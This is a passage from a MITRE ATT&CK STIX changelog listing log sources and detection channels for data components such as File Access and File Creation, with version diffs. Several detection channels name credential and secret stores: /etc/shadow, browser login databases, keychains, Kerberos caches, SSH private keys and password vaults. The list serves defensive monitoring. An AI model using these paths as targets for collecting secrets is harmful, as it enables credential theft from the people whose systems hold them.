                            "channel": "Repetitive inbound email delivery activity logged within a short time window"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "Application errors or resource contention from excessive frontend or script invocation"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "SPF fail OR DKIM fail OR DMARC fail OR mismatched header vs envelope domains"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "new DHCP configuration with anomalous DNS or router values"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "Mail or AppleScript subsystem"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "opened document|clicked link|EXC_BAD_ACCESS|abort|LSQuarantine"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "Anomalous keychain access attempts targeting payment credentials"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "Abnormal terminations of com.apple.security.* or 3rd-party security daemons"
                        },
                        {
                            "name": "networkdevice:controlplane",
                            "channel": "Syslog from edge devices with HTTP 500s on mgmt portal, SmartInstall events, unexpected CLI commands"
                        },
                        {
                            "name": "networkdevice:syslog",
                            "channel": "config push events"
                        },
                        {
                            "name": "networkdevice:syslog",
                            "channel": "SIP REGISTER, INVITE, or unusual call destination metadata"
                        },
                        {
                            "name": "networkdevice:syslog",
                            "channel": "Failed authentication requests redirected to non-standard portals"
                        },
                        {
                            "name": "NSM:Connections",
                            "channel": "PushNotificationSent"
                        },
                        {
                            "name": "NSM:Connections",
                            "channel": "Failed password or accepted password for SSH users"
                        },
                        {
                            "name": "saas:Airtable",
                            "channel": "EXPORT: User-triggered data export via GUI or API"
                        },
                        {
                            "name": "saas:application",
                            "channel": "High-frequency invocation of SMS-related API endpoints from publicly accessible OTP or verification forms (e.g., Twilio: SendMessage, Cognito: AdminCreateUser) with irregular destination patterns."
                        },
                        {
                            "name": "saas:application",
                            "channel": "High-volume API calls or traffic via messaging or webhook service"
                        },
                        {
                            "name": "saas:audit",
                            "channel": "Rule/ConfigChange: Auto-forward rules, delegate assignments, or changes to financial approval workflows"
                        },
                        {
                            "name": "saas:audit",
                            "channel": "Application added or consent granted: Integration persisting after original user disabled"
                        },
                        {
                            "name": "saas:box",
                            "channel": "User navigated to admin interface"
                        },
                        {
                            "name": "saas:collaboration",
                            "channel": "MessagePosted: Suspicious links or attachment delivery via collaboration tools (Slack, Teams, Zoom)"
                        },
                        {
                            "name": "saas:confluence",
                            "channel": "access.content"
                        },
                        {
                            "name": "saas:email",
                            "channel": "AuthenticationFailures (SPF/DKIM/DMARC) OR Domain Mismatch"
                        },
                        {
                            "name": "saas:finance",
                            "channel": "Transaction/Transfer: Unusual or large transactions initiated outside business hours or by unusual accounts"
                        },
                        {
                            "name": "saas:github",
                            "channel": "Bulk access to multiple files or large volume of repo requests within short time window"
                        },
                        {
                            "name": "saas:gmail",
                            "channel": "SendEmail, OpenAttachment, ClickLink"
                        },
                        {
                            "name": "saas:googledrive",
                            "channel": "FileOpen / FileAccess: Event-driven script triggering on user file actions"
                        },
                        {
                            "name": "saas:googleworkspace",
                            "channel": "OAuth2 authorization grants / Admin role assignments"
                        },
                        {
                            "name": "saas:hubspot",
                            "channel": "contact_viewed, contact_exported, login"
                        },
                        {
                            "name": "saas:okta",
                            "channel": "Conditional Access policy rule modified or MFA requirement disabled"
                        },
                        {
                            "name": "saas:okta",
                            "channel": "MFAChallengeIssued"
                        },
                        {
                            "name": "saas:okta",
                            "channel": "WebUI access to administrator dashboard"
                        },
                        {
                            "name": "saas:okta",
                            "channel": "Federation configuration update or signing certificate change"
                        },
                        {
                            "name": "saas:okta",
                            "channel": "System API Call: user.read, group.read"
                        },
                        {
                            "name": "saas:okta",
                            "channel": "policy.rule.update;system.log.disable;admin.role.assign"
                        },
                        {
                            "name": "saas:openai",
                            "channel": "High volume of requests to /v1/chat/completions or /v1/images/generations"
                        },
                        {
                            "name": "saas:salesforce",
                            "channel": "DataExport, RestAPI, Login, ReportExport"
                        },
                        {
                            "name": "saas:slack",
                            "channel": "file_upload, message_send, message_click"
                        },
                        {
                            "name": "saas:slack",
                            "channel": "chat.postMessage, files.upload, or discovery API calls involving token/credential regex"
                        },
                        {
                            "name": "saas:slack",
                            "channel": "OAuth token use by unknown app client_id accessing private channels or files"
                        },
                        {
                            "name": "saas:slack",
                            "channel": "conversations.history, files.list, users.info, audit_logs"
                        },
                        {
                            "name": "saas:slack",
                            "channel": "xternal DM or workspace invite preceding credential or approval actions"
                        },
                        {
                            "name": "saas:Snowflake",
                            "channel": "QUERY: Large or repeated SELECT * queries to sensitive tables"
                        },
                        {
                            "name": "saas:teams",
                            "channel": "ChatMessageSent, ChatMessageEdited, LinkClick"
                        },
                        {
                            "name": "saas:zoom",
                            "channel": "unusual web session tokens and automation patterns during login"
                        },
                        {
                            "name": "saas:zoom",
                            "channel": "Unexpected contact interaction preceding follow-on admin requests"
                        },
                        {
                            "name": "WinEventLog:Application",
                            "channel": "Outlook errors loading or processing custom form templates"
                        },
                        {
                            "name": "WinEventLog:Application",
                            "channel": "Office Add-in load errors, abnormal loading context, or unsigned add-in warnings"
                        },
                        {
                            "name": "WinEventLog:Application",
                            "channel": "Outlook rule execution failure or abnormal rule execution context"
                        },
                        {
                            "name": "WinEventLog:Application",
                            "channel": "Exchange Transport Service loads unusual .NET assembly or errors upon transport agent execution"
                        },
                        {
                            "name": "WinEventLog:Application",
                            "channel": "Unexpected spikes in request volume, application-level errors, or thread pool exhaustion in web or API logs"
                        },
                        {
                            "name": "WinEventLog:Application",
                            "channel": "Browser or plugin/application logs showing script errors, plugin enumerations, or unusual extension load events"
                        },
                        {
                            "name": "WinEventLog:Application",
                            "channel": "Outlook logs indicating failure to load or render HTML page in Home Page view"
                        },
                        {
                            "name": "WinEventLog:Application",
                            "channel": "EventCode=1000"
                        },
                        {
                            "name": "WinEventLog:Application",
                            "channel": "Service crash, unhandled exception, or application hang warnings for critical services (e.g., IIS, DNS, SQL Server)"
                        },
                        {
                            "name": "WinEventLog:Application",
                            "channel": "SCCM, Intune logs"
                        },
                        {
                            "name": "WinEventLog:Application",
                            "channel": "Unexpected web application errors or CMS logs showing modification to index.html, default.aspx, or other public-facing files"
                        },
                        {
                            "name": "WinEventLog:Application",
                            "channel": "VPN, Citrix, or remote access gateway logs showing external IP addresses"
                        },
                        {
                            "name": "WinEventLog:Application",
                            "channel": "Outlook rule creation, form load, or homepage redirection"
                        },
                        {
                            "name": "WinEventLog:Application",
                            "channel": "High-frequency errors or hangs from resource-intensive application components (e.g., .NET, IIS, Office Suite)"
                        },
                        {
                            "name": "WinEventLog:Application",
                            "channel": "Exchange logs or header artifacts"
                        },
                        {
                            "name": "WinEventLog:Application",
                            "channel": "Unusual DLL/plugin registration for IIS/SQL/Apache or unexpected error logs"
                        },
                        {
                            "name": "WinEventLog:Security",
                            "channel": "EventCode=6416"
                        },
                        {
                            "name": "WinEventLog:Security",
                            "channel": "EventCode=1102"
                        },
                        {
                            "name": "WinEventLog:Security",
                            "channel": "EventCode=4663, 4670, 4656"
                        },
                        {
                            "name": "WinEventLog:System",
                            "channel": "Changes to applicationhost.config or DLLs loaded by w3wp.exe"
                        },
                        {
                            "name": "WinEventLog:System",
                            "channel": "Device started/installed (UMDF) GUIDs"
                        },
                        {
                            "name": "WinEventLog:System",
                            "channel": "EventCode=1000"
                        },
                        {
                            "name": "WinEventLog:System",
                            "channel": "EventCode=104"
                        },
                        {
                            "name": "WinEventLog:System",
                            "channel": "EventCode=1341, 1342, 1020, 1063"
                        }
                    ],
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_version": "3.0",
                    "x_mitre_domains": [
                        "ics-attack",
                        "enterprise-attack",
                        "mobile-attack"
                    ],
                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-04-24 19:46:47.171000+00:00\", \"old_value\": \"2025-11-12 22:03:39.105000+00:00\"}, \"root['x_mitre_version']\": {\"new_value\": \"3.0\", \"old_value\": \"2.0\"}}, \"iterable_item_added\": {\"root['x_mitre_log_sources'][0]\": {\"name\": \"android:logcat\", \"channel\": \"Default IME active or bound to <pkg> (InputMethodManager reports imeId=<pkg>)\"}, \"root['x_mitre_log_sources'][1]\": {\"name\": \"android:logcat\", \"channel\": \"Default IME changed/active: imeId=<pkg>, onStartInput/onFinishInput high frequency. TYPE_APPLICATION_OVERLAY|addView .* showing on top of package <otherPkg>\"}, \"root['x_mitre_log_sources'][2]\": {\"name\": \"android:logcat\", \"channel\": \"Default IME active imeId=<pkg>; frequent onStartInput/commitText calls\"}, \"root['x_mitre_log_sources'][3]\": {\"name\": \"android:logcat\", \"channel\": \"addView TYPE_APPLICATION_OVERLAY|TYPE_APPLICATION_ATTACHED_DIALOG shown over <target_pkg>\"}, \"root['x_mitre_log_sources'][4]\": {\"name\": \"android:logcat\", \"channel\": \"Secure/Global reads of device_policy_manager, accessibility_enabled, default_vpn, always_on_vpn\"}, \"root['x_mitre_log_sources'][5]\": {\"name\": \"android:logcat\", \"channel\": \"Task switch from browser/custom tab to handler immediately after OAuth return\"}, \"root['x_mitre_log_sources'][6]\": {\"name\": \"android:logcat\", \"channel\": \"ACTION_OPEN_DOCUMENT_TREE / ACTION_OPEN_DOCUMENT invoked without user gesture or repeatedly in background\"}, \"root['x_mitre_log_sources'][53]\": {\"name\": \"iOS:unifiedlog\", \"channel\": \"Repeated or large UIPasteboard reads; background pasteboard access shortly before packaging\"}, \"root['x_mitre_log_sources'][54]\": {\"name\": \"iOS:unifiedlog\", \"channel\": \"UIPasteboard read (general/string/data) by <bundle_id>; repeated reads or background access\"}, \"root['x_mitre_log_sources'][55]\": {\"name\": \"iOS:unifiedlog\", \"channel\": \"UIWindow/UIView events indicating secure text entry focus, editingChanged bursts, unexpected firstResponder cycling\"}, \"root['x_mitre_log_sources'][56]\": {\"name\": \"iOS:unifiedlog\", \"channel\": \"Secure text entry focus and editingChanged bursts not typical for the app\"}, \"root['x_mitre_log_sources'][57]\": {\"name\": \"iOS:unifiedlog\", \"channel\": \"Presentation of credential-like view (UIAlertController with text fields / custom modal) not backed by system auth controller; frequent editingChanged in secureTextEntry fields\"}, \"root['x_mitre_log_sources'][58]\": {\"name\": \"iOS:unifiedlog\", \"channel\": \"Repeated canOpenURL checks across diverse schemes (\\u2265N within short window)\"}, \"root['x_mitre_log_sources'][59]\": {\"name\": \"iOS:unifiedlog\", \"channel\": \"UIDocumentPickerViewController presented repeatedly without foreground interaction or with short dwell time\"}, \"root['x_mitre_log_sources'][60]\": {\"name\": \"iOS:unifiedlog\", \"channel\": \"repeated sandbox denials related to restricted process/system interfaces consistent with process-table querying attempts\"}, \"root['x_mitre_log_sources'][61]\": {\"name\": \"iOS:unifiedlog\", \"channel\": \"security-relevant kernel log messages indicating restricted system interface access attempts by app process (device-dependent visibility)\"}, \"root['x_mitre_log_sources'][91]\": {\"name\": \"m365:exchange\", \"channel\": \"External sender message followed by user action involving links or attachments\"}, \"root['x_mitre_log_sources'][97]\": {\"name\": \"m365:teams\", \"channel\": \"External chat request or new tenant communication preceding approval activity\"}, \"root['x_mitre_log_sources'][139]\": {\"name\": \"m365:unified\", \"channel\": \"MailItemsAccessed; AddedInboxRule; ConsentToApplication; SharingSet\"}, \"root['x_mitre_log_sources'][140]\": {\"name\": \"m365:unified\", \"channel\": \"Set-AdminAuditLogConfig;New-ApplicationAccessPolicy;ConsentToApplication\"}, \"root['x_mitre_log_sources'][193]\": {\"name\": \"saas:okta\", \"channel\": \"policy.rule.update;system.log.disable;admin.role.assign\"}, \"root['x_mitre_log_sources'][200]\": {\"name\": \"saas:slack\", \"channel\": \"xternal DM or workspace invite preceding credential or approval actions\"}, \"root['x_mitre_log_sources'][204]\": {\"name\": \"saas:zoom\", \"channel\": \"Unexpected contact interaction preceding follow-on admin requests\"}, \"root['x_mitre_domains'][2]\": \"mobile-attack\"}}",
                    "previous_version": "2.0",
                    "version_change": "2.0 \u2192 3.0"
                },
                {
                    "type": "x-mitre-data-component",
                    "id": "x-mitre-data-component--235b7491-2d2b-4617-9a52-3c0783680f71",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2021-10-20 15:05:19.273000+00:00",
                    "modified": "2026-04-23 18:39:07.536000+00:00",
                    "revoked": false,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/datacomponents/DC0055",
                            "external_id": "DC0055"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "name": "File Access",
                    "description": "To events where a file is opened or accessed, making its contents available to the requester. This includes reading, executing, or interacting with files by authorized or unauthorized entities. Examples include logging file access events (e.g., Windows Event ID 4663), monitoring file reads, and detecting unusual file access patterns. Examples: \n\n- File Read Operations: A user opens a sensitive document (e.g., financial_report.xlsx) on a shared drive.\n- File Execution: A script or executable file is accessed and executed (e.g., malware.exe is run from a temporary directory).\n- Unauthorized File Access: An unauthorized user attempts to access a protected configuration file (e.g., `/etc/passwd` on Linux or `System32` files on Windows).\n- File Access Patterns: Bulk access to multiple files in a short time (e.g., mass access to documents on a file server).\n- File Access via Network: Files on a network share are accessed remotely (e.g., logs of SMB file access).",
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_deprecated": false,
                    "x_mitre_log_sources": [
                        {
                            "name": "macOS:unifiedlog",
                            "channel": "looking for file access to scripts with abnormal encoding patterns"
                        },
                        {
                            "name": "android:logcat",
                            "channel": "READ or COPY operations where path matches external/shared locations of other apps (e.g., /storage/emulated/0/Android/data/<otherpkg>/files/, /storage/emulated/0/Download/<app>/*)"
                        },
                        {
                            "name": "android:logcat",
                            "channel": "KeyChain/AndroidKeyStore read of token alias"
                        },
                        {
                            "name": "android:logcat",
                            "channel": "READ/LIST/STAT of /sdcard|/storage/emulated/0|/Android/media|/Documents with >N distinct paths in TimeWindow"
                        },
                        {
                            "name": "auditd:FILE",
                            "channel": "/home/*/.mozilla/firefox/*/logins.json OR /home/*/.config/google-chrome/*/Login Data"
                        },
                        {
                            "name": "auditd:FILE",
                            "channel": "/proc/*/mem read attempt"
                        },
                        {
                            "name": "auditd:FS",
                            "channel": "read: File access to /proc/modules or /sys/module/"
                        },
                        {
                            "name": "auditd:PATH",
                            "channel": "Read access to known backup software configuration files (e.g., /etc/rsnapshot.conf, /opt/veeam/config.ini)"
                        },
                        {
                            "name": "auditd:PATH",
                            "channel": "open: Access to sensitive log files (/var/log/auth.log, /var/log/secure, /var/log/syslog)"
                        },
                        {
                            "name": "auditd:PATH",
                            "channel": "PATH"
                        },
                        {
                            "name": "auditd:PATH",
                            "channel": "file read"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "open, read, or stat of browser config files"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "open: File access attempt on /tmp/krb5cc_* or /tmp/krb5.ccache"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "openat"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "open"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "open, read"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "open, flock, fcntl, unlink"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "read/open of sensitive files"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "Unusual processes accessing or modifying cookie databases"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "PATH records referencing /dev/video*"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "open, read: /etc/ssl/, /etc/pki/, ~/.pki/nssdb/"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "Processes reading credential or token cache files"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "read/open of sensitive file directories"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "open/read of sensitive config or secret files"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "open/read of sensitive directories"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "open/read: Access to /proc/self/status with focus on TracerPID field"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "open/read access to ~/.bash_history"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "open,read"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "open/read system calls to ~/.bash_history or /etc/shadow"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "read of /run/secrets or docker volumes by non-entrypoint process"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "Reads of ~/.bash_history, ~/.mozilla, or access to /dev/input"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "open/read"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "open: Access to named pipes or FIFO in /tmp or /dev/shm by unexpected processes"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "open or read to browser cookie storage"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "open, read, mount"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "file"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "Access to /var/lib/sss/secrets/secrets.ldb or .secrets.mkey"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "open/read of sensitive directories (/etc, /home/*)"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "PATH"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "open/read on ~/.local/share/keepassxc/* OR ~/.password-store/*"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "attempts to read /proc/* entries at scale (openat/getdents64/readlink) or access denied for /proc traversal; correlate to app UID"
                        },
                        {
                            "name": "azure:activity",
                            "channel": "CollectGuestLogs: Unexpected collection of guest logs by Azure VM Agent outside normal maintenance windows"
                        },
                        {
                            "name": "CloudTrail:GetObject",
                            "channel": "sensitive credential files in buckets or local image storage"
                        },
                        {
                            "name": "desktop:file_manager",
                            "channel": "nautilus, dolphin, or gvfs logs"
                        },
                        {
                            "name": "ebpf:syscalls",
                            "channel": "container_file_activity"
                        },
                        {
                            "name": "ebpf:syscalls",
                            "channel": "open/read on secret mount paths"
                        },
                        {
                            "name": "esxi:hostd",
                            "channel": "datastore file access"
                        },
                        {
                            "name": "esxi:hostd",
                            "channel": "read: Access to sensitive log files by non-admin users"
                        },
                        {
                            "name": "esxi:hostd",
                            "channel": "datastore/log file access"
                        },
                        {
                            "name": "esxi:hostd",
                            "channel": "vSphere File API Access"
                        },
                        {
                            "name": "esxi:hostd",
                            "channel": "file copy or datastore upload via HTTPS"
                        },
                        {
                            "name": "esxi:syslog",
                            "channel": "guest OS outbound transfer logs"
                        },
                        {
                            "name": "esxi:vmkernel",
                            "channel": "VMFS access logs"
                        },
                        {
                            "name": "esxis:vmkernel",
                            "channel": "Datastore Access"
                        },
                        {
                            "name": "File",
                            "channel": "None"
                        },
                        {
                            "name": "fs:fileevents",
                            "channel": "File system access events with kFSEventStreamEventFlagItemRemoved, kFSEventStreamEventFlagItemRenamed flags for environmental artifact collection (/System/Library, /usr/sbin, plist files)"
                        },
                        {
                            "name": "fs:fsevents",
                            "channel": "file system events indicating access to system configuration files and environmental information sources"
                        },
                        {
                            "name": "fs:fsusage",
                            "channel": "file"
                        },
                        {
                            "name": "fs:fsusage",
                            "channel": "File Access Monitor"
                        },
                        {
                            "name": "fs:fsusage",
                            "channel": "Disk Activity Tracing"
                        },
                        {
                            "name": "fs:fsusage",
                            "channel": "filesystem activity"
                        },
                        {
                            "name": "fs:fsusage",
                            "channel": "Filesystem Call Monitoring"
                        },
                        {
                            "name": "fs:fsusage",
                            "channel": "read/write"
                        },
                        {
                            "name": "fs:fsusage",
                            "channel": "file open for known browser cookie paths"
                        },
                        {
                            "name": "fs:fsusage",
                            "channel": "file reads/writes from /Volumes/"
                        },
                        {
                            "name": "fs:quarantine",
                            "channel": "/var/log/quarantine.log"
                        },
                        {
                            "name": "gcp:audit",
                            "channel": "Write operations to storage"
                        },
                        {
                            "name": "iOS:unifiedlog",
                            "channel": "READ operations from App Group containers (/var/mobile/Containers/Shared/AppGroup/...) or Files/Photos provider mountpoints, especially when group not owned by bundle"
                        },
                        {
                            "name": "iOS:unifiedlog",
                            "channel": "readdir/stat/read of /private/var/mobile/Containers/Shared/AppGroup|/Library/Mobile Documents|/On\\\\ My\\\\ iPhone with >N distinct paths in TimeWindow"
                        },
                        {
                            "name": "kubernetes:audit",
                            "channel": "GET or LIST requests to /var/run/secrets/kubernetes.io/serviceaccount/ followed by access to the Kubernetes API server"
                        },
                        {
                            "name": "linux:osquery",
                            "channel": "/proc/*/maps access"
                        },
                        {
                            "name": "linux:osquery",
                            "channel": "None"
                        },
                        {
                            "name": "linux:syslog",
                            "channel": "auth.log or custom tool logs"
                        },
                        {
                            "name": "linux:syslog",
                            "channel": "/var/log/syslog"
                        },
                        {
                            "name": "linux:syslog",
                            "channel": "kernel messages related to cryptographic operations, module loading, and filesystem access patterns"
                        },
                        {
                            "name": "m365:unified",
                            "channel": "FileAccessed, MailboxAccessed"
                        },
                        {
                            "name": "m365:unified",
                            "channel": "Bulk downloads or API extractions from Microsoft-hosted data repositories (e.g., Dynamics 365)"
                        },
                        {
                            "name": "macos:endpointsecurity",
                            "channel": "ES_EVENT_TYPE_NOTIFY_OPEN: Open of .dylib/.so in user-writable locations"
                        },
                        {
                            "name": "macos:endpointsecurity",
                            "channel": "open: Process opens AppleCamera/IOUSB device nodes or AVFoundation frameworks"
                        },
                        {
                            "name": "macos:endpointsecurity",
                            "channel": "open or read syscall to ~/.bash_history"
                        },
                        {
                            "name": "macos:endpointsecurity",
                            "channel": "es_event_open, es_event_exec"
                        },
                        {
                            "name": "macos:keychain",
                            "channel": "Access to Keychain DB or system.keychain"
                        },
                        {
                            "name": "macos:keychain",
                            "channel": "~/Library/Keychains, /Library/Keychains"
                        },
                        {
                            "name": "macos:osquery",
                            "channel": "file_events"
                        },
                        {
                            "name": "macos:osquery",
                            "channel": "None"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "Access to ~/Library/*/Safari or Chrome directories by non-browser processes"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "file events"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "Kerberos framework calls to API:{uuid} cache outside normal process lineage"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "~/Library/Application Support/Google/Chrome/*/Login Data OR ~/Library/Application Support/Firefox/*/logins.json"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "Read access to Time Machine plist files or CCC configurations in ~/Library/Preferences/"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "log stream - file subsystem"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "file read of sensitive directories"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "Abnormal process access to Safari or Chrome cookie storage"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "open: Access to /var/log/system.log or related security event logs"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "open/read of *.plist or .env files"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "read of user document directories"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "read access to ~/Library/Keychains/login.keychain-db"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "filesystem and process events"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "read access to ~/Library/Keychains or history files by terminal processes"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "access to /Volumes/SharePoint or network mount"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "Access to ~/Library/Safari/Bookmarks.plist or recent files"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "access to keychain database"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "log stream - file provider subsystem"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "read/write of user documents prior to upload"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "open/read access to private key files (id_rsa, *.pem, *.p12)"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "read: File access to /System/Library/Extensions/ or related kernel extension paths"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "*.opvault OR *.ldb OR *.kdbx"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "Recent download opened or executed"
                        },
                        {
                            "name": "MobileEDR:telemetry",
                            "channel": "Application reads multiple local container files, browser-history artifacts, messaging artifacts, or local records in rapid sequence during the collection phase"
                        },
                        {
                            "name": "MobileEDR:telemetry",
                            "channel": "Application performs burst reads across local system paths, external storage, media directories, cache locations, or local database files within a short interval as the primary collection phase"
                        },
                        {
                            "name": "MobileEDR:telemetry",
                            "channel": "application loads executable or library from external or writable directory (e.g., /sdcard/, app cache) prior to execution"
                        },
                        {
                            "name": "WinEventLog:Microsoft-Windows-Windows Defender/Operational",
                            "channel": "Suspicious file execution on removable media path"
                        },
                        {
                            "name": "WinEventLog:Security",
                            "channel": "EventCode=4663, 4670, 4656"
                        }
                    ],
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_version": "3.0",
                    "x_mitre_domains": [
                        "ics-attack",
                        "enterprise-attack",
                        "mobile-attack"
                    ],
                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-04-23 18:39:07.536000+00:00\", \"old_value\": \"2025-11-12 22:03:39.105000+00:00\"}, \"root['x_mitre_version']\": {\"new_value\": \"3.0\", \"old_value\": \"2.0\"}}, \"iterable_item_added\": {\"root['x_mitre_log_sources'][0]\": {\"name\": \"macOS:unifiedlog\", \"channel\": \"looking for file access to scripts with abnormal encoding patterns\"}, \"root['x_mitre_log_sources'][1]\": {\"name\": \"android:logcat\", \"channel\": \"READ or COPY operations where path matches external/shared locations of other apps (e.g., /storage/emulated/0/Android/data/<otherpkg>/files/, /storage/emulated/0/Download/<app>/*)\"}, \"root['x_mitre_log_sources'][2]\": {\"name\": \"android:logcat\", \"channel\": \"KeyChain/AndroidKeyStore read of token alias\"}, \"root['x_mitre_log_sources'][3]\": {\"name\": \"android:logcat\", \"channel\": \"READ/LIST/STAT of /sdcard|/storage/emulated/0|/Android/media|/Documents with >N distinct paths in TimeWindow\"}, \"root['x_mitre_log_sources'][40]\": {\"name\": \"auditd:SYSCALL\", \"channel\": \"attempts to read /proc/* entries at scale (openat/getdents64/readlink) or access denied for /proc traversal; correlate to app UID\"}, \"root['x_mitre_log_sources'][67]\": {\"name\": \"iOS:unifiedlog\", \"channel\": \"READ operations from App Group containers (/var/mobile/Containers/Shared/AppGroup/...) or Files/Photos provider mountpoints, especially when group not owned by bundle\"}, \"root['x_mitre_log_sources'][68]\": {\"name\": \"iOS:unifiedlog\", \"channel\": \"readdir/stat/read of /private/var/mobile/Containers/Shared/AppGroup|/Library/Mobile Documents|/On\\\\\\\\ My\\\\\\\\ iPhone with >N distinct paths in TimeWindow\"}, \"root['x_mitre_log_sources'][107]\": {\"name\": \"macos:unifiedlog\", \"channel\": \"Recent download opened or executed\"}, \"root['x_mitre_log_sources'][108]\": {\"name\": \"MobileEDR:telemetry\", \"channel\": \"Application reads multiple local container files, browser-history artifacts, messaging artifacts, or local records in rapid sequence during the collection phase\"}, \"root['x_mitre_log_sources'][109]\": {\"name\": \"MobileEDR:telemetry\", \"channel\": \"Application performs burst reads across local system paths, external storage, media directories, cache locations, or local database files within a short interval as the primary collection phase\"}, \"root['x_mitre_log_sources'][110]\": {\"name\": \"MobileEDR:telemetry\", \"channel\": \"application loads executable or library from external or writable directory (e.g., /sdcard/, app cache) prior to execution\"}, \"root['x_mitre_domains'][2]\": \"mobile-attack\"}}",
                    "previous_version": "2.0",
                    "version_change": "2.0 \u2192 3.0"
                },
                {
                    "type": "x-mitre-data-component",
                    "id": "x-mitre-data-component--2b3bfe19-d59a-460d-93bb-2f546adc2d2c",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2021-10-20 15:05:19.273000+00:00",
                    "modified": "2026-04-23 17:17:05.280000+00:00",
                    "revoked": false,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/datacomponents/DC0039",
                            "external_id": "DC0039"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "name": "File Creation",
                    "description": "A new file is created on a system or network storage. This action often signifies an operation such as saving a document, writing data, or deploying a file. Logging these events helps identify legitimate or potentially malicious file creation activities. Examples include logging file creation events (e.g., Sysmon Event ID 11 or Linux auditd logs). ",
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_deprecated": false,
                    "x_mitre_log_sources": [
                        {
                            "name": "File",
                            "channel": "None"
                        },
                        {
                            "name": "WinEventLog:Sysmon",
                            "channel": "EventCode=11"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "creat"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "file write"
                        },
                        {
                            "name": "macos:osquery",
                            "channel": "CREATE/MODIFY: Modification of app.asar inside .app bundle"
                        },
                        {
                            "name": "auditd:FILE",
                            "channel": "File creation with name starting with '.'"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "Creation or modification of browser extension .plist files"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "open or creat syscalls targeting excluded paths"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "file creation in AV exclusion directories"
                        },
                        {
                            "name": "auditd:SYSCALL",
